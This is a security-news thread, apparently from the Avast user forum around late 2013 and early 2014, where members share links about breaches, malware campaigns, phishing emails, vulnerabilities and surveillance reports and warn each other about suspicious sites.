Attempted hack against AVAST (https://blog.avast.com/2013/10/09/attempted-hack-against-avast/)
No one is ever 100% safe. We all need to stay vigilant!
-
No one is ever 100% safe. We all need to stay vigilant!
I wouldn't be too worried about an attempted hack, but only about a successful one. ;)
-
Redirects hides malicious Google Chrome extensions: http://blogs.technet.com/b/mmpc/archive/2013/10/11/redirect-hides-browser-extension.aspx
link article author = MMPC's Jonathan San Jose
polonus
-
Criminals Hit the ATM Jackpot (Symantec blog)
http://www.symantec.com/connect/blogs/criminals-hit-atm-jackpot (http://www.symantec.com/connect/blogs/criminals-hit-atm-jackpot)
-
I just received the following and, it was not caught by Gmail
as Spam or a Phishing attempt:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1381706175019-5667.png)
I don't have and have never had a Discover Card. the link provided leads to:
hxxp://alang-alang.vsu.edu.ph/language/red.php
-
PHISHING is from a link to hadamak dot com dot br -> http://support.clean-mx.de/clean-mx/phishing.php
and the site was also hacked earlier this year: https://www.zone-h.org/mirror/id/18886560
See for original site (IP migrated): http://urlquery.net/report.php?id=6704542
Just PM-ed mchain about this and have sent him an extensive report,
polonus
P.S. We seem to continue doing "under par" in the Brazilian malware theater, due to the fact that there exists an avast! mono-culture and malware is specifically hardened by malcrteants to evaded and circumvent avast detection as we conclude from the avast detection rate of Brazilian banking malware which is definitely under par. Tech also repeatedly complained about this situation. Avast should go "the extra mile"here, like in the old days the Old-Roman legionaires had the right to enlist (conscriptum) a citizen to carry his 65 KG pack for one mile, there was no dispute over this because every army-road in the Roman Imperium had milestones. So that is where the saying originates.
Damian
-
They also have one prepared for Wells Fargo.
In case you didn't fall for the Discover Card Scam.
(http://www.screencast-o-matic.com/screenshots/u/Lh/1381753450480-731.png)
The link leads to the same hijacked place as the last one.
-
Hi bob3160,
Some further analysis observations:
See where the redirect went: alang-alang.vsu.edu.ph/language/red.php (no alerts detected now)
What was there before: http://urlquery.net/report.php?id=6711562
For the IDS alerts suppressed: http://www.support.jpgottech.com/knowledgebase.php?article=52 (info Knowledgebase)
And here we are at the malware redirect:
GET /components/com_jnews/includes/openflashchart/tmp-upload-images/discovercard/discovercard/discover/index.php HTTP/1.1
Host: -hadamak.com.br
See: htxp://lifestyle.fsp.co.za/errors
On that main site htxp://lifestyle.fsp.co.za
lifestyle.fsp.co dot za/sites/all/modules/lightbox2/js/modal.js?9 benign
[nothing detected] (script) lifestyle.fsp.co.za/sites/all/modules/lightbox2/js/modal.js?9
status: (referer=lifestyle.fsp.co.za/)saved 953 bytes 88f181fe0d9236fdf705dde023973361ed3716cb
info: [decodingLevel=0] found JavaScript
error: undefined variable Drupal
error: undefined variable Drupal.behaviors
error: line:1: SyntaxError: missing ; before statement: (will leads to warnings in some IE browsers)
error: line:1: var Drupal.behaviors = 1; (do not dump PHP variables into JavaScript strings in such a way)
error: line:1: ....^
suspicious:
polonus
-
Thank Damien but, I never clicked the link so was never in any danger from the redirect.
This just points out that when you click on things you have no business clicking,
Your computer will most likely take a licking! :)
-
Hi bob3160,
Very well put, bob3160. ;D
These are the things we learn here at the forums,
just to "really watch our clicks".
You might be just one click away from danger.
Keep that at the back of your mind always.
I hope a lot of trigger-happy clickers will read through these posts,
and learn from it or....
they have to learn it "the hard way", :(
polonus
-
I'm constantly getting this kind of email, but just ignore it if I know darned well I've never done business or had an account with them. On extremely rare occasions I'll get the same kind of phishing attempt supposedly from my own bank or Paypal (quite a few from the latter lately), and I just forward those to the respective anti-phishing addresses for any appropriate further action on their part.
(edit, Polonus posted while I was still typing) Interesting typo there, looks like you "downgraded" Bob by 10 and then gave it back to him in the next line. ;) ;D
-
A Google search reveals bob3150 to be a Poker Star. ;) Since I only bet on sure things, that's not me. :)
-
@bob3169: The poker star gone, it is bob3160 again now.
@all
New threat and 35.000 websites hacked through a vBulletin hack: http://blog.imperva.com/2013/10/threat-advisory-a-vbulletin-exploit-administrator-injection.html and http://krebsonsecurity.com/2013/10/thousands-of-sites-hacked-via-vbulletin-hole/ (link article author Brian Krebs) - One should upgrade to a new version: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4000121-vbulletin-4-2-2-full-has-been-released
polonus
-
@polonus that's old bug, abused by hackers since 7th month (maybe 6th) of this Year and public known
http://forum.avast.com/index.php?topic=52252.msg984702#msg984702
-
Virus History
http://blogs.norman.com/2013/for-consumption/virus-history
-
This seems to be a router firmware back door season, read: http://ea.github.io/blog/2013/10/18/tenda-backdoor/ (with an n-map test script)
This backdoor was detected by Embedded Systems, Reverse Engineering's craig: -> http://www.devttys0.com/2013/10/from-china-with-love/
polonus
-
An interesting small video about the new windows 8.1 boot protection and a warning about the latest XP updates causing problems
http://technet.microsoft.com/en-us/windows/jj737995.aspx
http://kwsupport.com/2013/10/be-careful-with-kb2862330/
-
An interesting small video about the new windows 8.1 boot protection and a warning about the latest XP updates causing problems
http://technet.microsoft.com/en-us/windows/jj737995.aspx (http://technet.microsoft.com/en-us/windows/jj737995.aspx)
http://kwsupport.com/2013/10/be-careful-with-kb2862330/ (http://kwsupport.com/2013/10/be-careful-with-kb2862330/)
KB2862330 was apparently not for every OS. It isn't something I have on Windows 8.1 Pro
-
Some good news after Blackhole-exploitkit went down this time Sweet Orange Exploit Kit has gone:
http://vrt-blog.snort.org/2013/10/sweet-orange-exploit-kit-was-new-king.html
link author = JOEL ESLER
polonus
-
Symantec Monthly Intelligence Report [pdf]: http://www.symantec.com/content/en/us/enterprise/other_resources/b-intelligence_report_09-2013.en-us.pdf (http://www.symantec.com/content/en/us/enterprise/other_resources/b-intelligence_report_09-2013.en-us.pdf)
Archived reports, some dating back to 2002, can be gotten here: http://www.symantec.com/security_response/publications/archives.jsp (http://www.symantec.com/security_response/publications/archives.jsp)
-
Google Safe Browing malware alert on PHP.net: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.php.net/
Designers complain,
polonus
-
What to do if your computer is attacked by ransomware (https://blog.avast.com/2013/10/24/what-to-do-if-your-computer-is-attacked-by-ransomware/)
(https://blog.avast.com/wp-content/uploads/2013/10/Reveton-screenshot.png)
-
Hi bob3160,
Heard you can now also pay in Bitcoins ;D
No of course you better won't, thanks for the heads-up.
Damian
-
Dear AV provider: Do you enable NSA spying? Yours, EFF: http://arstechnica.com/security/2013/10/dear-av-provider-do-you-enable-nsa-spying-yours-eff/ (http://arstechnica.com/security/2013/10/dear-av-provider-do-you-enable-nsa-spying-yours-eff/)
-
Dear AV provider: Do you enable NSA spying? Yours, EFF: http://arstechnica.com/security/2013/10/dear-av-provider-do-you-enable-nsa-spying-yours-eff/ (http://arstechnica.com/security/2013/10/dear-av-provider-do-you-enable-nsa-spying-yours-eff/)
Do stupid questions really deserve an answer ???
-
What hackers can discover about you is 'chilling'
http://www.theage.com.au/digital-life/consumer-security/what-hackers-can-discover-about-you-is-chilling-20131028-2wbec.html
-
Adobe Breach Impacted At Least 38 Million Users
http://krebsonsecurity.com/2013/10/adobe-breach-impacted-at-least-38-million-users/
-
GWLoad mass injection malware is doing the rounds, 40.000 websites already infested: http://community.websense.com/blogs/securitylabs/archive/2013/10/29/gwload-new-mass-injection-making-its-rounds.aspx?cmpid=prfb
Security Unsavvy, do not say you haven't been warned!
polonus
-
Correct.
If an user ever encounters a proposed install of software they do not have at the moment, and it is on a site they do not know, or did not navigate to themselves, always treat the current window with suspicion and leave immediately!
No harm will come as one is free to leave as well as arrive.
Note that this infection campaign defeats and blocks the use of adblockers and reputation-based addons in your browsers when on an infected site.
New sites are created by the authors of this CPA campaign daily just to evade detection and cast the net wider and wider to lure unsuspecting visitors:
http://urlquery.net/report.php?id=7312506 (http://urlquery.net/report.php?id=7312506) See screenshot upper right.
Finally, always go to the actual vendors site to get the software you think you need, and nowhere else. ;)
-
Vulnerability Note VU#639620
Joomla! Media Manager allows arbitrary file upload and execution
http://www.kb.cert.org/vuls/id/639620
-
NSA infiltrates links to Yahoo, Google data centers worldwide, Snowden documents say
http://www.washingtonpost.com/world/national-security/nsa-infiltrates-links-to-yahoo-google-data-centers-worldwide-snowden-documents-say/2013/10/30/e51d661e-4166-11e3-8b74-d89d714ca4dd_story.html
-
NSA infiltrates links to Yahoo, Google data centers worldwide, Snowden documents say
http://www.washingtonpost.com/world/national-security/nsa-infiltrates-links-to-yahoo-google-data-centers-worldwide-snowden-documents-say/2013/10/30/e51d661e-4166-11e3-8b74-d89d714ca4dd_story.html
I think every country with an American Embassy is infiltrated by the NSA.
http://www.rappler.com/nation/42596-manila-us-listening-post (http://www.rappler.com/nation/42596-manila-us-listening-post)
-
Upatre malware downloader infected 900.000 computers so-far
Read : http://blogs.technet.com/b/mmpc/archive/2013/10/31/upatre-emerging-up-d-at-er-in-the-wild.aspx article author MMPC's Rodel Finones
also read: http://www.secureworks.com/cyber-threat-intelligence/threats/analyzing-upatre-downloader/ link authors: Brett Stone-Gross, Ph.D. and Russell Dickerson, Dell SecureWorks Counter Threat Unit(TM) Threat Intelligence
pol
-
nothing new....just Facebook again
Facebook users: watch out for two phishing fake-outs
http://blogs.norman.com/2013/for-consumption/facebook-users-watch-out-for-two-phishing-fake-outs
-
a horror story.....
Toy Story 2: How bad back-ups nearly destroyed the movie
http://blogs.norman.com/2013/for-consumption/toy-story-2-how-bad-back-ups-nearly-destroyed-the-movie
-
Vulnerability in Microsoft Graphics Component Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2896666 (http://technet.microsoft.com/en-us/security/advisory/2896666)
http://securitygarden.blogspot.com.au/ (http://securitygarden.blogspot.com.au/)
-
Vulnerability in Microsoft Graphics Component Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2896666 (http://technet.microsoft.com/en-us/security/advisory/2896666)
http://securitygarden.blogspot.com.au/ (http://securitygarden.blogspot.com.au/)
Windows 8 and 8.1 are not affected. :)
-
Vulnerability in Microsoft Graphics Component Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2896666 (http://technet.microsoft.com/en-us/security/advisory/2896666)
http://securitygarden.blogspot.com.au/ (http://securitygarden.blogspot.com.au/)
Windows 8 and 8.1 are not affected. :)
Yep it's good to have the latest OS safer than being sorry rather crawling down from W7 to the dead XP ;D
-
Microsoft rushes out fix to Office security exploit
http://www.theage.com.au/it-pro/security-it/microsoft-rushes-out-fix-to-office-security-exploit-20131105-hv2eo.html
The 20 most popular passwords stolen in Adobe hack
http://www.theage.com.au/digital-life/consumer-security/the-20-most-popular-passwords-stolen-in-adobe-hack-20131106-2x03o.html
'Anonymous' collective hackers intensify cyber attacks across south-east Asia
http://www.theage.com.au/it-pro/security-it/anonymous-collective-hackers-intensify-cyber-attacks-across-southeast-asia-20131104-hv2bx.html
Adobe hack: 38m users impacted, Photoshop source code also stolen
http://www.theage.com.au/it-pro/security-it/adobe-hack-38m-users-impacted-photoshop-source-code-also-stolen-20131029-hv2ab.html
-
more on the adobe hack
http://news.softpedia.com/news/Over-1-9-Million-of-Adobe-Hack-Victims-Used-123456-as-Password-397148.shtml
Top 100 Adobe Passwords with Count
http://stricture-group.com/files/adobe-top100.txt
-
Microsoft Security Intelligence Report – the State of Affairs
http://blogs.norman.com/2013/business/microsoft-security-intelligence-report-the-state-of-affairs
The numbers are clear – XP users are overrepresented on the infection statistics.
link to the rport at the bottom of article
-
GIMP flees SourceForge over dodgy ads and installer. (http://www.theregister.co.uk/2013/11/08/gimp_dumps_sourceforge_over_dodgy_ads_and_installer/)
Another download site that needs to be avoided. :'(
If you have no choice at least be aware of potential CrapWare included with your download.
-
Protecting windows users from malicious extensions
http://blog.chromium.org/2013/11/protecting-windows-users-from-malicious.html
-
Fake Facebook Scam about Oprah Winfrey committing suicide:
Scroll down to news section: (avast antivirus database update link) http://www.avast.com/en-us/lp-fr-virus-update?p_ext=chrome&utm_source=prg_fav_60_0&utm_medium=prg_lnk&utm_campaign=free2paid&utm_content=prg_fav_en-usvirus-update-default&p_var=.%2Ffa%2Fen-us%2Fvirus-update-default&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=363&p_lng=en&p_lid=en-us&p_elm=43&p_vbd=1367 (http://www.avast.com/en-us/lp-fr-virus-update?p_ext=chrome&utm_source=prg_fav_60_0&utm_medium=prg_lnk&utm_campaign=free2paid&utm_content=prg_fav_en-usvirus-update-default&p_var=.%2Ffa%2Fen-us%2Fvirus-update-default&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=363&p_lng=en&p_lid=en-us&p_elm=43&p_vbd=1367)
For those who don't want to visit, see .jpg attached below:
-
Internet Explorer Zero-Day Flaw Exposes Windows 7, XP Users
http://news.softpedia.com/news/Internet-Explorer-Zero-Day-Flaw-Exposes-Windows-7-XP-Users-399035.shtml
-
Microsoft to Patch Internet Explorer Zero-Day Flaw Today
http://news.softpedia.com/news/Microsoft-to-Patch-Internet-Explorer-Zero-Day-Flaw-Today-399265.shtml
-
President Obama hacked – is anyone safe?
http://blogs.norman.com/2013/for-consumption/president-obama-hacked
-
President Obama hacked – is anyone safe?
http://blogs.norman.com/2013/for-consumption/president-obama-hacked (http://blogs.norman.com/2013/for-consumption/president-obama-hacked)
We all know that he's more of a target than any of us will ever be.
-
MacRumors Forums: Security Leak
http://www.macrumors.com/2013/11/12/macrumors-forums-security-leak/
http://arstechnica.com/security/2013/11/hack-of-macrumors-forums-exposes-password-data-for-860000-users/
-
If you've visited Cracked.com lately, You may have a Cracked Computer:
http://securitywatch.pcmag.com/malware/317941-cracked-com-had-malware-clean-up-your-computer-now (http://securitywatch.pcmag.com/malware/317941-cracked-com-had-malware-clean-up-your-computer-now)
-
Read: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4007195-important-message-regarding-your-account
Change passwords and do not use any you used somewhere else in the past,
polonus
-
How to stop Google from using your Plus profile as caller ID
http://www.zdnet.com/how-to-stop-google-from-using-your-plus-profile-as-caller-id-7000023191/ (http://www.zdnet.com/how-to-stop-google-from-using-your-plus-profile-as-caller-id-7000023191/)
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1384799979581-48653.png)
I just received this, as stated in the header, it is TRASH.
Do Not Reply, Do Not Open the Attachment
-
Thats garbage.
In the rubbish can with it. And forget it.
-
Thats garbage.
In the rubbish can with it. And forget it.
Do you not think Bob knows that !
The point in this topic is to warn others about security related issues and phishing emails are just one such instance.
-
At times very instructive to read what a developer should not do: https://www.owasp.org/index.php/How_to_write_insecure_code
(courtesy of OWASP dot org)
When I scan websites for malcode, I suspect some to use this as a manual ;D
polonus
-
200 websites compromised: http://www.pcworld.com/article/2064580/hackers-actively-exploiting-jboss-vulnerability-to-compromise-servers-researchers-say.html
pol
-
There was a new update for the Tor bundle: https://blog.torproject.org/blog/new-tor-browser-bundles-firefox-17011esr-and-tor-02418-rc
This should not give you a false sense of security.
Tor seems vulnerable to identifiers for NSA targeting e.g. quantum cookie "“packet injection” attacks,
injecting a 302 redirect to a FOXACID server, and other such methods of surveillance (ga.js &.o).
So some even go as far as to say: "Tor stinks", while it still upholds some form of anonymity.
All you do on the Internet now is in public and is not private.
Always be fully aware of these facts.
polonus
-
Fallout from Nuclear Pack exploit kit highly toxic for Windows machines
http://blog.avast.com/2013/11/20/fallout-from-nuclear-pack-exploit-kit-highly-toxic-for-windows-machines/
-
i2Ninja malware doing the rounds.
This new financial malware has been discovered using the I2P darknet to send stolen banking credentials to its command and control servers.
Read: http://www.trusteer.com/blog/out-of-the-shadows-%E2%80%93-i2ninja-malware-exposed (link article author = Etay Maor )
polonus
-
seems Google playstore have apps With malware :-\
https://www.virustotal.com/en/file/536c95792e8820bb3b41c56b8b9d32a44cddc48c037efa9a0c04264421f6abe5/analysis/1385333474/
htxps://play.google.com/store/apps/details?id=com.bestfreeandroidwallpapers.wallpapermirandakerr&hl=en
-
Hi Pondus,
That is bad, now that we are only supposed to install exclusively from there.
Again do not trust anything by sight alone, investigate.
Better safe than sorry, Pondus.
Thanks for the heads-up on this one!
polonus
-
Seems like Android is following Windows in searching for free wallpapers you invariably could find malware - the difference here is it is in the play store not just as a result of a search.
-
Hi Pondus,
That is bad, now that we are only supposed to install exclusively from there.
Again do not trust anything by sight alone, investigate.
Better safe than sorry, Pondus.
Thanks for the heads-up on this one!
polonus
Polonus,
It's always good to get a head's up on this sort of thing. Those in the know tend to have long memories like elephants, and seem to avoid potential pitfalls like this one, but I fear for those who do not make the daily effort to keep up with things, good as well as bad.
Not surprised at all by this news.
Even if you centralise the program download location as Google has now done, expect malcreants to find their way in. They do it everywhere else. That's their job and that is what they get up every day for. Like Anonymous says, "Expect Us". Some things never change.
@ DavidR, good point. ;D
-
We're making TOO MUCH CASH (http://www.theregister.co.uk/2013/11/25/cryptolocker_varmints_lower_decryption_price/)
'generous' cybercrooks to slash their demands.
Some good news! (Really ??? )
-
More like we're asking for to much in the way of extortion and people aren't prepared to pay.
-
Blackshades Rat Usage on the Rise Despite Author’s Alleged Arrest (Symantec blog)
http://www.symantec.com/connect/blogs/blackshades-rat-usage-rise-despite-author-s-alleged-arrest (http://www.symantec.com/connect/blogs/blackshades-rat-usage-rise-despite-author-s-alleged-arrest)
-
Botnets survival spared as an important resource for official surveillance data, read->
http://www.darkreading.com/attacks-breaches/a-mercenary-approach-to-botnets/240164329 link author = Gunter Ollman
pol
-
CryptoLocker uses email as main infection vector: (see attached .jpg) Source: bleeping computer.com Infected websites also a threat.
Full blog info here (including snipped .jpg below): http://www.bleepingcomputer.com/virus-removal/cryptolocker-ransomware-information (http://www.bleepingcomputer.com/virus-removal/cryptolocker-ransomware-information)
-
New Linux worm targets routers, cameras, “Internet of things” devices
Too many Internet-connected devices run code that's woefully out of date.
http://arstechnica.com/security/2013/11/new-linux-worm-targets-routers-cameras-internet-of-things-devices/
http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices
http://www.symantec.com/security_response/writeup.jsp?docid=2013-112710-1612-99
-
Online safety: which website cares most about your data?
http://blogs.norman.com/2013/for-consumption/online-safety-which-website-cares-most-about-your-data
-
In the News: spying TVs and tea kettles, data leaks
http://blogs.norman.com/2013/business/in-the-news-spying-tvs-and-tea-kettles-data-leaks
-
Filecoder epidemic goes global as Australians among “millions” of victims worldwide (Eset )
http://www.welivesecurity.com/2013/11/28/filecoder-epidemic-goes-global-as-australians-among-millions-of-victims-worldwide/
-
Well I need help instead of commentating on the stick thread or whatever it was. I went into a website and then Avast told me it was a malicious URL so I closed the page. Ever since I have gotten that notice over and over again about every 10 minuets, then 5 and hour later, and now I pops up about every 2 minuets. I can't get it to stop, does this mean that that website has launched a virus that is still attacking my computer? ???
-
Well I need help instead of commentating on the stick thread or whatever it was. I went into a website and then Avast told me it was a malicious URL so I closed the page. Ever since I have gotten that notice over and over again about every 10 minuets, then 5 and hour later, and now I pops up about every 2 minuets. I can't get it to stop, does this mean that that website has launched a virus that is still attacking my computer? ???
Sorry but this topic is not for problem solving, please start a topic of your own in the Viruses and Worms section http://forum.avast.com/index.php?board=4.0
-
Major security hole in XP the MS fix may well negatively affect sharing and networking
http://www.bbc.co.uk/news/technology-25152328
-
Would this thread also apply to websites that you attempt to visit and get a warning for?
-
Would this thread also apply to websites that you attempt to visit and get a warning for?
No
-
Would this thread also apply to websites that you attempt to visit and get a warning for?
this thread is for posting security news....
if you have virus or false positive problem use viruses and worms forum section
for removal help, follow the logs to assist in cleaning malware guide at top in that section and help will arrive...
-
Well I need help instead of commentating on the stick thread or whatever it was. I went into a website and then Avast told me it was a malicious URL so I closed the page. Ever since I have gotten that notice over and over again about every 10 minuets, then 5 and hour later, and now I pops up about every 2 minuets. I can't get it to stop, does this mean that that website has launched a virus that is still attacking my computer? ???
Hi Virushater47,
Please follow the above advice Pondus gave to user mjazz to get the help you need. It's not the correct thread to ask for such.
-
Rogue antivirus that takes webcam pictures of you
http://www.webroot.com/blog/2013/11/27/new-rogue-now-takes-screenshots/
-
Rogue antivirus that takes webcam pictures of you
http://www.webroot.com/blog/2013/11/27/new-rogue-now-takes-screenshots/
They would have a hard time here (even if it got past the defences), no webcam on this system :P
-
Cyber experts uncover 2 million stolen passwords to global Web accounts
http://in.reuters.com/article/2013/12/05/cybercrime-pony-idINDEE9B400D20131205
-
Cyber experts uncover 2 million stolen passwords to global Web accounts
http://in.reuters.com/article/2013/12/05/cybercrime-pony-idINDEE9B400D20131205
Is this a known keylogger, or something new?
-
Cyber experts uncover 2 million stolen passwords to global Web accounts
http://in.reuters.com/article/2013/12/05/cybercrime-pony-idINDEE9B400D20131205 (http://in.reuters.com/article/2013/12/05/cybercrime-pony-idINDEE9B400D20131205)
Is this a known keylogger, or something new?
Reading the article quoted, tells you that this has nothing to do with keyloggers or anything new.
It points out that many people still haven't learned that 123456 or other such passwords are't acceptable
and easily compromised.
-
Reading the article quoted, tells you that this has nothing to do with keyloggers or anything new.
It points out that many people still haven't learned that 123456 or other such passwords are't acceptable
and easily compromised.
I assumed that it did.
However:
"The massive data breach was a result of keylogging software maliciously installed on an untold number of computers around the world, researchers at cybersecurity firm Trustwave said. The virus was capturing log-in credentials for key websites over the past month and sending those usernames and passwords to a server controlled by the hackers."
http://money.cnn.com/2013/12/04/technology/security/passwords-stolen/
-
Microsoft disrupts ZeroAccess botnet in collaboration with FBI and Europol (http://www.neowin.net/news/microsoft-disrupts-zeroaccess-botnet-in-collaboration-with-fbi-and-europol)
Microsoft has revealed that it has disrupted a “rampant botnet” known as ‘ZeroAccess’ –
which has so far infected almost two million PCs –
in collaboration with the FBI, Europol and industry partners.
-
BGP exploit attack threat, read: http://www.renesys.com/2013/11/mitm-internet-hijacking/ link article author - Jim Cowie
Unwanted upstream providers?
Route Monitoring should brought in, see: http://www.bgpmon.net/services/route-monitoring/
polonus
-
Despite valiant takedown efforts #zeroaccess bots have already been updated with new ClickFraud infrastructure. The battle continues....
quote taken from -> https://twitter.com/threatintel/statuses/408989605178785792
Botnet has been updated with a new clickfraud method,
polonus
-
The NSA Uses Google's Cookies to Track Specific Targets
http://news.softpedia.com/news/The-NSA-Uses-Google-s-Cookies-to-Track-Specific-Targets-407977.shtml
-
Christmas time! Do you want a malware present?
Avast Blog: http://blog.avast.com/2013/12/12/christmas-time-do-you-want-a-malware-present/
Sample: https://www.virustotal.com/de/file/C669E7E9E9A6FA4E321670E8237AEFDE73991425B8320C23F3A9F9FACA61B7C3/analysis/
-
World-sucking Octopus launched: https://twitter.com/ODNIgov/status/408712553179533312/photo/1
polonus
-
Google Removes Vital Privacy Feature: https://www.eff.org/deeplinks/2013/12/google-removes-vital-privacy-features-android-shortly-after-adding-them
Also read: https://plus.google.com/+DannyHolyoake/posts/FkfBxA5i3iG
Good we still have this - XPrivacy: http://www.androidpolice.com/2013/06/23/xprivacy-gives-you-massive-control-over-what-your-installed-apps-are-allowed-to-do/
polonus
-
Upgrade to WordPress 3.8!
http://wordpress.org/news/2013/12/parker/
-
Blue Coat Acquires Norman Shark
http://normanshark.com/news-events/press-releases/blue-coat-acquires-norman-shark/
-
(http://a57.foxnews.com/global.fncstatic.com/static/managed/img/156/88/targeted640.JPG?ve=1)
40 Million Credit and Debit Card customers are at risk! (https://corporate.target.com/discover/article/Important-Notice-Unauthorized-access-to-payment-ca)
( I'm one of those 40 Million. :'( )
-
This is for the really paranoid :) .. This will work
http://www.cs.tau.ac.il/~tromer/acoustic/
-
It is time to change your Samsung account password, if you own one ;)
MediaTest Digital, a company which tests security of mobile devices and software, was able to elicit sensitive user data from Samsung accounts. Names, email addresses, and passwords were all at risk. MediaTest took the news to Heise Security - a tech news outlet based in Germany. The media was able to confirm that the hole did in fact exist by extracting user's private data from Samsung accounts as well. Heise took this information to Samsung, and the Korean manufacturer responded to the problem immediately. Only 5 days after receiving the report, the Korean giant announced publicly that the security hole has been fixed. There is no word on follow up tests to verify whether or not the patch has actually been made though.
http://www.gsmarena.com/samsung_patches_security_hole_in_gs4-news-7398.php
-
40 Million Credit and Debit Card customers are at risk! (https://corporate.target.com/discover/article/Important-Notice-Unauthorized-access-to-payment-ca)
( I'm one of those 40 Million. :'( )
Cards Stolen in Target Breach Flood Underground Markets
http://krebsonsecurity.com/2013/12/cards-stolen-in-target-breach-flood-underground-markets/
-
40 Million Credit and Debit Card customers are at risk! (https://corporate.target.com/discover/article/Important-Notice-Unauthorized-access-to-payment-ca)
( I'm one of those 40 Million. :'( )
Cards Stolen in Target Breach Flood Underground Markets
http://krebsonsecurity.com/2013/12/cards-stolen-in-target-breach-flood-underground-markets/ (http://krebsonsecurity.com/2013/12/cards-stolen-in-target-breach-flood-underground-markets/)
Since actually using the card at a Target Store is one of the requirements for being a victim, I'm happy to say that
neither Alice or I actually used the card in or out of the store during the listed timeframe.
(After this fiasco, I will probably get rid of this card.)
-
(After this fiasco, I will probably get rid of this card.)
I'd do so Bob. (If you ever used it there.)
-
40 Million Credit and Debit Card customers are at risk! (https://corporate.target.com/discover/article/Important-Notice-Unauthorized-access-to-payment-ca)
( I'm one of those 40 Million. :'( )
Cards Stolen in Target Breach Flood Underground Markets
http://krebsonsecurity.com/2013/12/cards-stolen-in-target-breach-flood-underground-markets/
Exclusive: Target hackers stole encrypted bank PINs - source
http://www.reuters.com/article/2013/12/25/us-target-databreach-idUSBRE9BN0L220131225
-
NSA intercepts Windows error reports: http://www.spiegel.de/international/world/the-nsa-uses-powerful-toolbox-in-effort-to-spy-on-global-networks-a-940969-2.html
polonus
P.S. Blocking this: http://blog.laptopmag.com/disable-error-reporting-windows
-
Security researcher cancels talk at RSA conference in protest
http://news.idg.no/cw/art.cfm?id=60BD7FD4-9C49-1163-82CC191AC1C7C62A
-
4.6 million Snapchat phone numbers and usernames leaked
http://www.theverge.com/2014/1/1/5262740/4-6-million-snapchat-phone-numbers-and-usernames-leaked
-
Complete top level of scam domain should be blocked: http://bluecoat.com/security-blog/2013-05-07/health-and-finance-spam-version-death-and-taxes
article author = Chris Larsen
polonus
-
Malicious advertisements served via Yahoo
http://blog.fox-it.com/2014/01/03/malicious-advertisements-served-via-yahoo/
-
Progression:
Ransomware = Crypto Locker = Power Locker
More on Power Locker (http://malwaremustdie.blogspot.ro/2014/01/threat-intelligence-new-locker-prison.html)
-
The contents of the last two messages here taking as one threat -> malvertisements take users to Fake AV: http://www.invincea.com/2014/01/dailymotion-com-redirects-to-fake-av-threat/2/
pol
-
40 Million Credit and Debit Card customers are at risk! (https://corporate.target.com/discover/article/Important-Notice-Unauthorized-access-to-payment-ca)
( I'm one of those 40 Million. :'( )
Cards Stolen in Target Breach Flood Underground Markets
http://krebsonsecurity.com/2013/12/cards-stolen-in-target-breach-flood-underground-markets/
Exclusive: Target hackers stole encrypted bank PINs - source
http://www.reuters.com/article/2013/12/25/us-target-databreach-idUSBRE9BN0L220131225
Target Provides Update on Data Breach and Financial Performance
http://pressroom.target.com/news/target-provides-update-on-data-breach-and-financial-performance
-
Hackers Steal Card Data from Neiman Marcus
http://krebsonsecurity.com/2014/01/hackers-steal-card-data-from-neiman-marcus/
-
How USB sticks stole from ATMs
http://blogs.norman.com/2014/for-consumption/how-usb-sticks-stole-from-atms
-
What is Bitcoin – and how could it hurt my computer?
http://blogs.norman.com/2014/for-consumption/what-is-bitcoin-and-how-could-it-hurt-my-computer
-
Spammers hijack links on Google + -> http://searchengineland.com/thousands-of-hotels-listings-were-hijacked-in-google-local-181670
link article author Danny Sullivan
polonus
-
Spammers hijack links on Google + -> http://searchengineland.com/thousands-of-hotels-listings-were-hijacked-in-google-local-181670 (http://searchengineland.com/thousands-of-hotels-listings-were-hijacked-in-google-local-181670)
link article author Danny Sullivan
polonus
As the article states, Google has already cleaned up the hijacked sites.
-
Hi bob3160,
Then Google folks are doing the same as we do here on the forums (spam cleansing) but on a grand scale :),
Damian
-
NSA secret and covert pathways into foreign air-gapped computers
http://www.nytimes.com/2014/01/15/us/nsa-effort-pries-open-computers-not-connected-to-internet.html?hp&_r=1 (http://www.nytimes.com/2014/01/15/us/nsa-effort-pries-open-computers-not-connected-to-internet.html?hp&_r=1)
Other devices than PC's/workstations affected as well.
-
Why experts again advise to uninstall Java altogether, see: http://www.kb.cert.org/vuls/id/625617
Some kernel components should be completely rewritten according to Bitdefender's Bogdan Botezatu on Twitter Bogdan Botezatu
ATbbotezatu.
polonus
-
Adware vendors buy Chrome Extensions to send ad- and malware-filled updates
http://arstechnica.com/security/2014/01/malware-vendors-buy-chrome-extensions-to-send-adware-filled-updates/
-
Vietman Governmental Attackers use poisoned Word documents to attack critical bloggers-> https://www.virustotal.com/nl/file/351813270729b78fb2fe33be9c57fcd6f3828576171c7f404ed53af77cd91206/analysis/
-> https://www.virustotal.com/nl/file/351813270729b78fb2fe33be9c57fcd6f3828576171c7f404ed53af77cd91206/analysis/
The malicious part is https://threatcenter.crdf.fr/?More&ID=83663&D=CRDF.Virus.Virus.MSWord.Sattelite987105478
and has been around since 2012 and is being used in the latest versions also: https://malwr.com/analysis/NWM5NDU4NmM4NWNlNDJiYzhiYmM4ODhkNGQzNWFkMTY/
Only 1 of 49 av vendors detect the attack code heuristically,
polonus
-
SPAM supposedly spotted leaving the fridge. ;D
http://www.theregister.co.uk/2014/01/20/spam_spotted_leaving_the_fridge/
http://www.proofpoint.com/about-us/press-releases/01162014.php
-
EE BrightBox routers can be hacked 'by simple copy/paste operation'
http://www.theregister.co.uk/2014/01/20/brightbox_routers_vuln/
-
Adware vendors buy Chrome Extensions to send ad- and malware-filled updates
http://arstechnica.com/security/2014/01/malware-vendors-buy-chrome-extensions-to-send-adware-filled-updates/
Nice apps get bad makeover after spammers buy them
http://blog.avast.com/2014/01/20/nice-apps-get-bad-makeover-after-spammers-buy-them/
-
Chrome Bugs Allow Sites to Listen to Your Private Conversations
